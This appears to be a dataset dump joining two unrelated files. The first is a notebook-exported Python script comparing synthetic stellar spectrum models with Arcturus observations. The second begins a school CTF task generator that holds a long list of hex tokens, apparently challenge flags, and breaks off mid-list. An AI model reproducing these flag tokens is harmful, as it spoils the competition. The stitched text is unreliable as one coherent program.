plt.suptitle("Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# Relative
plt.figure(figsize=(15, 15))
ax0 = plt.subplot(411)
((aces_spec - settl_spec)/aces_spec).plot(axis=ax0)
plt.title("PHOENIX ACES - BT-Settl")
plt.ylabel("Flux")
ax1 = plt.subplot(412)
((settl_spec - cond_spec)/settl_spec).plot(axis=ax1)  # divided, to match the "Relative" intent of this figure
plt.title("BT-Settl - BT-Cond")
plt.ylabel("Flux")
ax2 = plt.subplot(413)
((dusty_spec - cond_spec)/dusty_spec).plot(axis=ax2)
plt.title("BT-Dusty - BT-Cond")
ax3 = plt.subplot(414)
((next_spec - cond_spec)/next_spec).plot(axis=ax3)
plt.title("NextGen - Cond")
plt.suptitle("Relative Synthetic Differences\nArcturus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[7]:
# COMPARISON TO BT-SETTLE models
# Full Spectrum Differences
plt.figure(figsize=(15, 15))
ax0 = plt.subplot(511)
(settl_spec - next_spec).plot(axis=ax0)
plt.title("BT-Settl - BT-NextGen")
plt.ylabel("Flux")
ax1 = plt.subplot(512)
(settl_spec - cond_spec).plot(axis=ax1)
plt.title("BT-Settl - BT-Cond")
plt.ylabel("Flux")
ax2 = plt.subplot(513)
(settl_spec - dusty_spec).plot(axis=ax2)
plt.title("BT-Settl - BT-Dusty")
ax3 = plt.subplot(514)
(cond_spec - dusty_spec).plot(axis=ax3)
plt.title("BT-Cond - BT-Dusty")
ax4 = plt.subplot(515)  # was subplot(414), which drew over ax3's panel
(next_spec - cond_spec).plot(axis=ax4)
plt.title("BT-NextGen - Cond")
plt.suptitle("BT-XXX Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# Relative
plt.figure(figsize=(15, 15))
ax10 = plt.subplot(511)
((settl_spec - next_spec)/settl_spec).plot(axis=ax10)
plt.title("BT-Settl - BT-NextGen")
plt.ylabel("Flux")
ax11 = plt.subplot(512)
((settl_spec - cond_spec)/settl_spec).plot(axis=ax11)
plt.title("BT-Settl - BT-Cond")
plt.ylabel("Flux")
ax12 = plt.subplot(513)
((settl_spec - dusty_spec)/settl_spec).plot(axis=ax12)
plt.title("BT-Settl - BT-Dusty")
ax13 = plt.subplot(514)
((cond_spec - dusty_spec)/cond_spec).plot(axis=ax13)
plt.title("BT-Cond - BT-Dusty")
ax14 = plt.subplot(515, sharex=ax10)  # was subplot(414, ...), which drew over ax13's panel
((next_spec - cond_spec)/next_spec).plot(axis=ax14)
plt.title("BT-NextGen - Cond")
plt.suptitle("BT-XXX Relative Synthethic Differences\nArtucus-like\nTeff=4300, logg=2.5, Fe/H= 0.0")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[8]:
# ARCTURUS 1000nm ('artucus' in the data paths)
artucus_1 = "/home/jneal/Phd/data/artucus/10097-10155_s-obs.fits"
data, hdr = fits.getdata(artucus_1, header=True)
artucus_1 = Spectrum(xaxis=get_wavelength(hdr)/10, flux=data, header=hdr)
artucus_1 = artucus_1.normalize("linear")
# In[9]:
#limits = [2100, 2200]
limits = [artucus_1.xaxis[0]-2, artucus_1.xaxis[-1]+2]
print(limits)
next_spec.wav_select(*limits)
next_spec = next_spec.normalize("exponential")
dusty_spec.wav_select(*limits)
dusty_spec = dusty_spec.normalize("exponential")
settl_spec.wav_select(*limits)
settl_spec = settl_spec.normalize("exponential")
cond_spec.wav_select(*limits)
cond_spec = cond_spec.normalize("exponential")
aces_spec.wav_select(*limits)
aces_spec = aces_spec.normalize("exponential")
# In[10]:
print(np.mean(vac2air(aces_spec.xaxis*10)/10 - aces_spec.xaxis)*3e5)  # size of the mean vac-to-air shift, scaled by c in km/s
artucus_1 = align2model(artucus_1, aces_spec)
# In[11]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[12]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([1014.25, 1015])
plt.legend()
plt.show()
# In[13]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([1012, 1013])
plt.legend()
plt.show()
# In[14]:
# Adjust resolution to R=100000
R = 100000
from convolve_spectrum import convolve_spectrum
old_spec = aces_spec.copy()
next_spec = convolve_spectrum(next_spec, chip_limits=[next_spec.xaxis[0], next_spec.xaxis[-1]], R=R, plot=False)
dusty_spec = convolve_spectrum(dusty_spec, chip_limits=[dusty_spec.xaxis[0], dusty_spec.xaxis[-1]], R=R, plot=False)
settl_spec = convolve_spectrum(settl_spec, chip_limits=[settl_spec.xaxis[0], settl_spec.xaxis[-1]], R=R, plot=False)
cond_spec = convolve_spectrum(cond_spec, chip_limits=[cond_spec.xaxis[0], cond_spec.xaxis[-1]], R=R, plot=False)
aces_spec = convolve_spectrum(aces_spec, chip_limits=[aces_spec.xaxis[0], aces_spec.xaxis[-1]], R=R, plot=False)
assert aces_spec != old_spec
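# convolve_spectrum comes from a local module; a minimal sketch of the idea,
# assuming a uniform wavelength grid: convolve with a Gaussian instrument
# profile whose FWHM is lambda/R. (gaussian_broaden is a hypothetical helper,
# not the project's convolve_spectrum.)
def gaussian_broaden(wav, flux, R):
    """Broaden flux to resolving power R with a Gaussian kernel (uniform-grid sketch)."""
    from scipy.ndimage import gaussian_filter1d
    step = np.mean(np.diff(wav))                  # wavelength grid spacing
    fwhm = np.mean(wav) / R                       # instrument profile FWHM at band centre
    sigma = fwhm / (2 * np.sqrt(2 * np.log(2)))   # convert FWHM to Gaussian sigma
    return gaussian_filter1d(flux, sigma / step)  # sigma expressed in pixels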
# In[15]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[16]:
plt.figure(figsize=(15, 10))
artucus_1.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([1014, 1016])
plt.legend()
plt.show()
# # Arcturus 2000nm
# In[17]:
artucus_2 = "/home/jneal/Phd/data/artucus/21380-21518_s-obs.fits"
data, hdr = fits.getdata(artucus_2, header=True)
artucus_2 = Spectrum(xaxis=get_wavelength(hdr)/10, flux=data, header=hdr)
# In[18]:
w_settl, f_settl, bb_settl = load_Allard_Phoenix("data/lte043.0-2.5-0.0a+0.0.BT-Settl.spec.7")
settl_spec = Spectrum(xaxis=vac2air(w_settl*10)/10, flux=f_settl)
w_dusty_spec, f_dusty_spec, bb_dusty_spec = load_Allard_Phoenix("data/lte043-2.5-0.0.BT-Dusty.spec.7")
dusty_spec = Spectrum(xaxis=vac2air(w_dusty_spec*10)/10, flux=f_dusty_spec)
w_next, f_next, bb_next = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-NextGen.7")
next_spec = Spectrum(xaxis=vac2air(w_next*10)/10, flux=f_next)
w_cond, f_cond, bb_cond = load_Allard_Phoenix("data/lte043-2.5-0.0a+0.0.BT-Cond.7")
cond_spec = Spectrum(xaxis=vac2air(w_cond*10)/10, flux=f_cond)
w_aces, f_aces = load_phoenix_aces("data/lte04300-1.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes.fits")
aces_spec = Spectrum(xaxis=vac2air(w_aces*10)/10, flux=f_aces)
# In[19]:
#limits = [2100, 2200]
limits = [artucus_2.xaxis[0]-2, artucus_2.xaxis[-1]+2]
print(limits)
next_spec.wav_select(*limits)
next_spec = next_spec.normalize("exponential")
dusty_spec.wav_select(*limits)
dusty_spec = dusty_spec.normalize("exponential")
settl_spec.wav_select(*limits)
settl_spec = settl_spec.normalize("exponential")
cond_spec.wav_select(*limits)
cond_spec = cond_spec.normalize("exponential")
aces_spec.wav_select(*limits)
aces_spec = aces_spec.normalize("exponential")
# In[20]:
artucus_2 = align2model(artucus_2, aces_spec)
# In[21]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.legend()
plt.show()
# In[22]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([2139, 2141])
plt.legend()
plt.show()
# In[23]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([2142, 2144])
plt.legend()
plt.show()
# In[24]:
# Adjust resolution to R=100000
R = 100000
from convolve_spectrum import convolve_spectrum
old_spec = aces_spec.copy()
next_spec = convolve_spectrum(next_spec, chip_limits=[next_spec.xaxis[0], next_spec.xaxis[-1]], R=R, plot=False)
dusty_spec = convolve_spectrum(dusty_spec, chip_limits=[dusty_spec.xaxis[0], dusty_spec.xaxis[-1]], R=R, plot=False)
settl_spec = convolve_spectrum(settl_spec, chip_limits=[settl_spec.xaxis[0], settl_spec.xaxis[-1]], R=R, plot=False)
cond_spec = convolve_spectrum(cond_spec, chip_limits=[cond_spec.xaxis[0], cond_spec.xaxis[-1]], R=R, plot=False)
aces_spec = convolve_spectrum(aces_spec, chip_limits=[aces_spec.xaxis[0], aces_spec.xaxis[-1]], R=R, plot=False)
assert aces_spec != old_spec
# In[25]:
plt.figure(figsize=(15, 10))
artucus_2.plot(label="Artucus")
dusty_spec.plot(label="BT-DUSTY")
settl_spec.plot(label="BT-SETTL")
cond_spec.plot(label="BT-COND")
aces_spec.plot(linestyle="--", label="PHOENIX ACES")
next_spec.plot(linestyle=":", label="NEXTGEN")
#plt.plot(w_dusty_fits, f_dusty_fits/max(f_dusty_fits), label="Dusty fits")
plt.title("Artucus - 4300K")
plt.xlabel("Wavelength(nm)")
plt.ylabel("Flux")
plt.xlim([2142, 2144])
plt.legend()
plt.show()
| avg_line_length: 26.463178 | max_line_length: 156 | alphanum_fraction: 0.734163 | (remaining per-file qsc_* quality signals omitted)
| hexsha: 46b3990d5d1c687694b854c35ba1ecf4650740c2 | size: 19,352 | ext: py | lang: Python
| max_stars/max_issues/max_forks repo_path: tasks-deploy/oil/generate.py | repo_name: chankruze/qctf-school-2018 | repo_head_hexsha: 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | licenses: ["MIT"] | star/issue/fork counts and dates: null
tokens = ['35a408771319c6bb7f9832cd4c633d1a', '9038a7c7afad7e1a118ab6ceebd727de', '72e1ffd020ff72fe63a72191513d826c', 'fae39128db475e6b764c63681dffd80c', '2bcee2876e30b4907279c8b4164f91d6', '9db5efcb843bf05b5811268157b92697', '78504d25cbac7fabd1bfd303aeb65346', '4dbc99a6d49715e34a0fca1a000b58f1', 'c7dbe1be63fbf3fe065253951a232808', '21edb202b1db5b652262dc25952f2195', 'de8e9356b230cb9b9f937827dd3130f8', 'c4dbc181eae3536dbfa11a7169c2652c', 'd23f1a6aaa85eba322171869043033fe', '4e11d26b790a28c71dd16f9451fc6cf6', 'd4aa1fd5227f44b257176b0ebc93a41c', '4015c8ae57928938487c57860e89d7de', 'ed56a2fc2b98fa4c4d2a5015f32f8547', '4ba160981bfe7541580c80198edbb25e', 'a65a979bbd18609e1864348d7990b128', '7c4e588fedce832460a08ab59aa3a72f', 'c92ad1f9b302afe676fbb56969121901', '31e14d0450d6d9ac3234f8df5f0aee39', '61e99810ea9f10ee1e0b14a3bc209db1', 'e2c3b870f67ddbe001cad17e21d6dfa6', 'bfb725e66b37f34e6980fcbca4b2422e', '738cda579244e8aaad3457e30f3c2992', 'f9a3cce294d8d8daac75b72c23fa9719', '69f8dbcc9d39df54102d76d304173108', '85f1d72e638464f69f95460b47f90e71', '6094ac55ba08419d6af8f2417d15f74a', 'ccb21a90d8b6b8ba3b9f7dc1538692fb', '6a1044a94d2c4f9ee94d40374b29d1ab', 'd7c16689b24e0fd54634d9b06714e340', 'fbb0d6e0dc975092f319a5e2247cf981', 'a04405285a7f9eb4062f3aef567ff87a', '423215e93ffd89136b2fee919c188d3b', 'd7ecc1e6081a7f0edd34b5ea4843dd3d', 'a53e89ce6d32d9ea4397ca3362efc506', 'e4350ab0edb122b1c686c64383a8d2e0', 'cb1df0b70cd70511855553c64aaa3053', '0c87644b42680ed45db571c18b0332a1', 'c81b1d0a34d692c4135dbf0c02dc8375', 'f82f95956d5a22f7496eb3b5b8164d18', '0268e4a16215074eaad0f99c38553749', '37d4d52896a0007e05c7038df1fdf0e6', '53c5cc29342c155af07cd4195eea7beb', 'cf6c42026a9bbfcbfd4b8e57ee1ac4d8', '0d4ca29c4ceec6e6be5b1cb163151d0d', '48e94b249a4e19f65ee7879393632287', 'e7c2b6818a8aea98d538dec383334543', '2792d676b5b9d1ea2152d46ad0175652', 'a415372b7322134a072a2441f993c069', '81d201e15c10b14e972f4b614a32e3d7', '30f6de0dddac5f3a1a39e8d5f4d23410', '1b5685ce998b5f55210d0f66986c8c00', 'fca89d9e624d55a697d7ec51e2187944', '13aee1cf0fc3e0cc7c36c8e445baae1f', '4bacd730c6a05e1391c0c836aa582b14', 'd8510a11829be69577295a1e2dda8294', '48fc507ec8f849e273e6f71ac9cfe79b', '4288acd1dd6eb8a4b88336b1e4724a2a', 'c9c50c13b991138151cc52edd59f9c2f', 'e0b73e0d71c1ac1ea355cee0e667b31c', '1bc2f2a01ccace031237c6418293a447', '8b69e063eb6fba0ae1f62033c4d31e7e', '14fa5319ffaaee8b52d33eeb9d7cd5cc', '3981f953a50dc222886e2660918c228e', 'f81622f7fac9be649d8db7ca45eb0481', 'a464c2cf5f8c1acb13497e057e2ac27e', 'f6a8561aa655a5ff15655918fd108c92', 'a3167482e6c6dc0e330b3769c65b3e51', 'fb847455599f82911e62a79b720a8b4c', '45ebf7c64fa3577183febe53a0f0c539', '66f1eca8c32397e4adfdfd23bee4444c', '45fd0f67400bc7d00d078baa7f601bca', '826e149a92f7e45d7f5fe1d242ae508f', '78f897ddaad2aa7b985e9075db3ae8b0', '8518d5fbeffd8fdac2fc435eef6ffc27', '9684306ec11607f3714c8ebff70443d8', '1b329b13b38e9328787b27d28557bd1c', '84a74197dbf8c7616d46b2d8fdc70a01', '54360ed0c9d112e1eac10e03e02c56e3', '5becee4c7199a45fb6bddc07b0306bc3', 'd83948bfde4f6a3d093018c17cb45ca1', '163d9938dc76452368ecc60eab72af6a', 'de78340b49ee3dfa911f99eb985fb9d4', 'efe3b2719b43c8aba4f69f75d462ac8d', '669ff582f242c42ebf5d0ec5b1b707d3', '9628b7078c3c8254c3310e176e9b286a', 'bd8897ed0b64b82ce1e8ca404f23d1b2', '122702a57b817c106a4254e4f1b49614', '8e492211a6dfa7736d60d62f40ccd296', '122ec1e3319957e9c5757b2a7b9f04b4', '0dd9551bc9e5eb05ad0024116eb2f178', '56155a50c11f3b0c51df8c5d0944510a', '04e47aefa5f0b26bf334cbec940854c0', 'ba4232e6d4a5bc4541dfc005df1e8e16', '6482cefec7b48edeede4ca4d7187841b', 
'6464e9b41846c67682729151c70c694e', '31413380f5b90f5e37fdbbb81d635139', '44c216c536368a78f39ba13113781aa2', '76cc21bb8d267e8db94efd420e8aa0e9', '684106fd5bea15ff6428c92956b949ff', 'a770555ade594484cfe8c9e2ec7c88fb', '86d649d271a28b987909ad5839d59573', '86c9c6fc2978bf8a04389dc8a4ed122e', '1ec19cbc162e00dc332595e497a881a9', '45fc67f33e5748d05476940c6c6bc7c4', '6fc3af3cc635e538f75ab09dd9339a48', 'fc10e83d0d6ce4e6b6fe6e4406d63b53', 'ac2b9e67a9331f7f9cece30c056fddfa', '74d62a41d218e3d68a4830ec331fe4f2', 'bb5f8cc50ee4b01d064ca3f744b6fef3', '6e5da614760cfbd19911e63184991d6e', '4abb7b9e213084d2779f28028182614a', '6a1f668bad08e1afc52f69f4c65110aa', 'daeb01091292dfdfad1438657c7f6ff5', 'a44ea540ecca868cecefbac0877860e1', '4e4003375c00f54e6a6fac8b3edaefdf', '5b2742f8cc02b7f11dada94513aa1739', '0a3a3f4f96a0ab452796a2c9005408f3', 'f5887acdd0a99b73ef1060d02ba00b18', 'f2c71e88f340368eadf869d907a29eb9', '6d879ced527b8730ef54e029d4d52c35', 'd201cfd8d59764a9fec9baef192b81e3', '9389c3ed157c38c9cc444cca4d65a090', 'aaa5eb610e20efa8bbb6472a5ade35e5', '50ff4919d965977c4bfa18bca079ec19', '4a7becb9e67567b7f436d26646b75511', 'c1b4554df66ded827c6d4c3b0314aec1', '268d40e27b019ec3c7616d1aca8ea904', '5a69f009902d021ebe6b9c144629ef50', '6388bd2f1ae7c3ca1b75d1b6650739cf', 'ba1435c8eee5a653bfb4ceb6abc4c0a5', '6f88bfe72dc9b1087ebfdbe4d22b71b6', '864ef40970e416a6d16caf5104b39d6a', 'e3c499ee4cd98a500e408266abfeb4f2', '258773d3830a83f125820fa95a63e0b9', '4e92f845990b9196a4b45649b8ccb553', 'c3f5d0193ee5a9d07e504252d59201b0', '7142dee82df1537ae713ec8e35cceda8', 'f0fb7d7270dd5358bdad4bf1dd9635d6', '5bfa20bb6cbadc4a04827ff7a604a8ce', '65aecd170403a07367d48dcc6980afd7', 'ecf0e55d5708bfa817a56698b8110b39', 'c0a09cdae4c47a78db2c336934ba7e68', 'bdab048a60cf7359501684f9499f44ce', '258bb02e7f3d0a90fc76a0ef92e05e8c', '776470672a42684924343cd8b206eba5', 'bbf91d646231bf714d629883750d20e0', 'bb1baaf364be0f598aa9c0133176451b', 'c951701d6f5504a645e28c2e6ff1480a', 'ebe31aa9da13229318115044f3e468ca', 'a49536a0b30242affc316bb87a0272b8', 'f220c2caacfa415780916e97c9ca6908', '8eb489a1753bdc6cfb545cacd035bfe7', '7b7ffa3f7fa83128d6026fd15f134b85', '0ce4da3e71c6b7cc0a5637948aa0f48e', 'e429f0e53d4047c5f4defa094d183c8b', '17bb2a3de16819115f326fc1a9c126b6', '31c2029a630afa6656c73326e044b099', '044ed8160bf6723104a606a98823ae41', '875b55c8acae55e3db7195935aec6ff7', 'a594c6df9d5daf37625ec90936e1fb00', '958c8bd2792649ece8c2f837b323fca2', 'f797ec9d880655b378bbb6dc44ae9c53', '21a7449654fada0238d68bf9c419954d', 'a297720aeb7d373f545f6380d6c27909', '915ed23eae74fc6cd2b4719f7c5d21f0', '8dfe9f285dad3c94bc0fc517f3680269', 'cb65d63303f04fb1a3c4e53b58947ec4', '5e93f5f338e7ac9f04adad6b94bfe7cd', '69b897d71d59345da297ebaa13ca55a0', 'fb53b9c04f8b32189fc1eef2cd09a773', '365274e17d39f68bad1cdce48970d7f7', '01533df28f9d69687023191d84ff8f4a', '71876f98391899b01b34f8e7eb0df2be', 'dea69889d655b18cb5e6cdcb4ba71e58', 'da70221af35a381282e6e04b2a4963a1', '0e502488efa70c14584947251e78fe4a', '58ec4bbc7546e204c00d731f1aeaf54c', 'da3382fd176eb9dc83ed1b0b2e40fe23', '61b5bc45fbf56943829c7972fb30d71c', 'f73099ae6167c961b0c4130b1c825040', '846ead08d3bb312a69256e070f22d772', 'b2355eb179396a4d1943a3a4763ebd82', '4e532e031391740efc3f7ce178154b98', '9ec9d777505074839e43383f6daae6e5', '3928692e776ad3e640e543a15d33847d', '3f2879459b124350f844fc19a19246e1', '51e0f10f5cf3cf237724aa10137128d8', '4c6161babd7acd9bf6f194e30cf680c8', 'c6ac613dd5c8d6c803b32c42b951d81e', 'd5cf0ffd3eb457cc93b8502f46bbcaf9', '44bb407fa06c00f9e12c17168ac638f1', '09989176460ffc43b523da90b574f1fe', 
'6bc542e7eeab785410283cd4cf10d4cf', 'e91dec93184db42e88c83c857de95b22', '34639b479ac9889ce3b239194df17ca0', 'b2ce4c43c37748aa6110ad7fd239c859', 'c9ab512f602a171a2cff50daeb9bad81', '50debb18d08ea9a2fa8f424e5d9911f2', '9c0ff5a9ee35f05ae73e3fbcc9c24253', 'cb02c82400cb8f7bee7e8e2341732d47', '26e9a59a8a6232c560e9daaba5417cc4', 'a549c1482a8064c4664e36b1e3c3dbea', '64ae5e0626186c693f6e696ca5d7c2f4', '4f2b168dabfff44a9d4c9855e7a7e13e', '94f54944f1b8e9368b35c0f0a4058835', '159a8b7a5b90742fd0147b86895cf17a', 'c55f32a21ca390ddc7c7b72cc3cafff3', 'fa2366327fdaf077d42a01d2952dc561', '5c6e736654604d3a9eb66d63b33c02da', '74941d0e802085150c3a0da698dfb115', 'a8c36c765dda3f2a1ecb2984076b00d9', 'fb970b94f104c403e1565e5a3212af3c', 'a83ec3e5403d2c86b0f732ab939f4a72', '5405d151f2b0025dbb580546d65bdbd0', '03f53034ce6872432bbb49b7ba955acf', '96ed927408586898a68d2eb1ac19715d', '78b9b4455a47c522bbb201146029b515', '544d810455faf5f3aca28c55d1d32d09', '9326819719836bf8d57eec319f5da9cf', 'e27322003a6ed3f02539bae800f21c89', 'fa9922e6eac3c9791ccbfa36d7d59fd8', 'aa4bbd27e10fe9e059a7dbaedfedf9c0', '74476c341c1fe62b655840fc66468398', 'bc014de29856a721b80bebc2079edf01', '8b3a39284e305f7186279060847cf92a', 'aa73892e1ac243a21a49dc82b07bde96', '94766fd201cb77282766f1add45ebec8', '17f88633faa0f3082ceaffda96236355', 'c6203be41d862b0100137d15b927eeff', '6c55b48f06a287fd06f26f6a4abf0df6', '3ba309b87598510a1d4715f07d7a8b9b', '250e0128810ec7d51901f8ec5a4d5af5', 'b7487dce771d9ef30b9632d68de1afc5', 'ff4e491dee859982dc74899b2907e8aa', '808c7a81735ce09bcc060a90300ebd14', '03b0731e808d92ce62aa1c0e95d01830', '832dff4b1518f3d6fc796e660827147d', 'bab3f6aabaf6a1967834368f88aee4d6', 'ffabb38905f1fb6cacf25a75db242ed5', '0a5080f2f98361a1638f092d76c31565', 'd861283dd35c855a6ff4d6ab0f0e0a61', 'b0ddfe7672ce4c58170b0a7f5c7b88ec', 'f067d6666f288be9076c2cfa0fc4542a', '31b65c888ea77fbbd200c518041150ab', '696f93f2ee3f1f010b18b33e2aa66237', '3c4dd6eedad966f6a8e0f5f460938dba', 'c68c077ab41ff39112f14ead937fd532', '2f13331ed5a06244005339b5bd855446', 'b1d2766f7914aadead949d1e620c78b2', '9b9d84c8c8df825c6f64501d1dfdb3ff', '2fd19fde2de73b8df9717c0ccc5b7c89', 'f647d786987c80ed033cd886e5039f3a', '2864180b56a82b04acf8cc36302790d2', '3f40180870a1a137f55fa99c86ec2da4', 'd4e0c4a49ba763a9c859f6c0b8115a5a', 'b5b25bc5911090da9f8148ad5aa96bd2', 'b12eb2cdd6eee70fd52041261d2a8a08', '297e9fac9d47ffb39be37209e7e65d58', '086be6291d4b35db93abf429cfd31a43', 'fa676ae581e5cd670fef56a418314159', 'f7e7670d68201be307db4a37f5f4cc1e', 'b717da981091840a0ef406f70d9a11bf', '2834284dd065d683bce326183e54dcde', '94f5a82ef70428e28ee7e653bd8e9941', '0a20e7820626eee921ffbafa337adc3b', 'c4219157880322adc31ceed984ae43ce', '54b43e833b37da0aa31343277dbc3ff1', 'aa2df0c2734542401199f84fd7c42f06', 'f5ae4b1379d92c4c4041d306a8381614', 'fe3cefe5a25d95f8737ecbe780b5c6d5', '75f45f279dbb4ff604eae12ae489286a', '7cc45e621d57f22be42827c223564c4a', '43ae14df6ea243839dc8f71571cc66fe', '983de3a79c050183a68c948b496f0cea', '0195899b2ff64a230e7ad663d562cd0a', 'bc5c2cf1ef9390dc709530c12020fbc5', 'a81918d29975f96c6b180638d8f6b6a7', '6a80fcbc454710867c95264b52c8a13b', 'b7e5dddefcacf816ca7e7776edb62b56', '4cafdbf77a4fe75c08be17ce85f0984b', '2831f75125dd024eed90b5ce7727e849', '84c3a26a2d4c9c6ce7f178a4d58a844b', '89e89e943f432244cd8b3cbe70ec43b9', '506ea00d1bc37e7dfd0796f0a21d5b12', 'c8b5b7924097568bf5e1cf688d505efa', '17f5452d0decd8e9453a62cf82886754', 'd80807d986b784fad217f96b064d961a', '938a3e72ebcee1d3b0a0f6d6d3f65177', 'cc4069c76123625e747554a71dec8564', '82cc4100dc1680115ec6e1c68c0cebe3', 
'73ca8814c796b54fc5428bb14fe3eb9c', '4ca996937b17ea7c2da81481975c28ed', '6eeaa54ee22c234ac467c16459c18229', '4649abdf27b437cfa8117a92af0d6cda', '0d6e2cb506fc16e0185bda39ca2fd0a4', '46c50b5c04612cab561320eefb3e65f5', '1f41ab6dd4dd86f4b4d76b870e3a63b8', '5f616cb55a1ef53f6af1182613e83cb7', '1b0d949ede2301e9c03594392de4ab4d', '6a947aa4623f5ecfecb7c5e44bac1135', 'e98c203935b8f1e9120efc2d09e23d6b', '7d2fe596d102a7231a6a9dfd503bc50e', '75a7854f7c5c7291ffc99153bbccdebe', '61d746eae4aa56e208603727be60ce12', '08b9a0ce9da4d1bcfc1a3797ed745288', 'ab2aff565cde8dc9a5ddcc23cbdcb889', '17bc67bd15382aae234e0efe1c8314a0', 'ec77f870d03437910c5bca4a6e25f97b', '99e66b2ef5f8d22fc08f47802380ae0f', '9c8f1a1b4c6bcf722b2f710e3f64aefa', '30230e202b482a6cd65bd2321e2b0307', 'e859e0b46727b24d89637c36d3277d42', '51cb437b9ef2d66134914ef6686a6363', '9e384249cec420478ae896da3014f6d3', 'e7010a6a398b42500dc81319fb0751fe', '9cc980af98507087a034f6a14a2798e5', '7e0c54cf6a21ac914e7cf3452273d1be', '23ac1f09f96dcd5af9c07b3c0b7f5121', 'e6001db10ed6410e5c3f06b729ae410d', 'd5f0e63e4760ceeed9fa15e949a1269c', '2ae89f3ae167fed66b257f6bc1f80883', 'f54ac531976447b978bc704387e9a845', '53c52aaa9315ae28798cdd5c02f52964', 'a2e99c22ee7001c270e7a06cbceeab30', 'ab2b7c8d76c7f979112810ff9782db06', '5e7fb4a83ea75f134a276f75ee20042f', 'e17ed752217a70f56d8280d0ee02d69d', '370a294eff91b2ea743c0f51c1f88aeb', '04ba9ea135b7ecf747c39035cdc3ba46', '1c25d1026c3361f3b29e327eeb7d61fb', '0ae6b72521f178394d077594f513775b', '95a7735e53de56d599b9e7279e1a577f', 'edaa16de18ae33433aa7e09bdace31b4', 'f6940035b5e087142425130f70dadfb2', 'aa702881a78b6e41398a2af83ed71ff6', '3638dc0ad1f75033f11c19952207ef8e', '8cd8b978cd03eca21f9a1d89cd1e9308', 'db40a4b6db72e464abb156fa4305d197', '7f210ad6b42c3fdf8a1629179398a5c1', 'efeb95f4b9bd88e224e3ad105437dc73', '5d0ce325869174dba91bfafd4f593bf9', '9ae56f89101225770184020773a4747e', '3582889c23537f8532d724ed62ebc136', 'd3660dea229e631eb7055f51d45523b3', 